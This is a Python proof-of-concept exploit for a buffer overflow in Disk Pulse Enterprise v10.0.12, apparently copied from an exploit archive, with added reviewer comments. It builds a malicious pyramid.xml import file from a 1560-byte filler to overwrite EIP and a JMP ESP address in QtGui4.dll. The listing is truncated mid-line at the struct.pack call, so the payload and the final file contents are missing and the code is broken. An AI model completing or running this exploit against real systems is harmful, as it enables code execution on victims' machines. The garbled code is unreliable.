#!/usr/bin/python
# Exploit Title : Disk Pulse Enterprise v10.0.12 - Buffer Overflow
# Discovery by : Anurag Srivastava
# Email : anurag.srivastava@pyramidcyber.com
# Website : www.pyramidcyber.com
# Discovery Date : 25/08/2017
# Software Link : http://www.diskpulse.com/setups/diskpulseent_setup_v10.0.12.exe
# Tested Version : 10.0.12
# Tested on OS : Windows 7 Ultimate x64bit and Windows 10 Home Edition x64
# Steps to Reproduce: Run the python file to generate pyramid.xml and then open Disk Pulse software , right click and click on import command . Select pyramid.xml file .
#
# NOTE(review): this listing is a proof-of-concept generator, not a parser of
# untrusted input. Its only output is a file named pyramid.xml written to the
# current working directory. The page as extracted is incomplete: the text
# between the opening quote of the struct.pack() format string and the
# f = open(...) call is missing (presumably the `<`...`>` of a '<L' format
# string was swallowed as markup), so the struct.pack() arguments and the
# assignment of `file` are not visible here and are NOT reconstructed below.

# `os` is imported but not used anywhere in the visible text; it may be used in
# the portion that was lost.
import os,struct

#offset to eip
# 1560 bytes of filler; per the header comment above this is the distance to
# the saved return address in the import handler — TODO confirm against the
# original advisory, the value is not derivable from this page.
junk = "A" * (1560)

#JMP ESP (QtGui4.dll)
# The struct.pack() call is truncated on this page: its format string and the
# address argument are missing, and the original line ends here. Everything
# from this point to `f = open(...)` has been lost in extraction.
jmp1 = struct.pack(''
# Output file is created relative to the current working directory and
# overwritten without prompting ('w' mode).
f = open('pyramid.xml', 'w')
# `file` is not assigned anywhere in the visible text (its assignment is in the
# lost span); on Python 2 — which the shebang and the plain `open()` style
# suggest — `file` is also a builtin, which this name shadows.
f.write(file)
# Explicit close rather than a `with` block; the file is flushed only here.
f.close()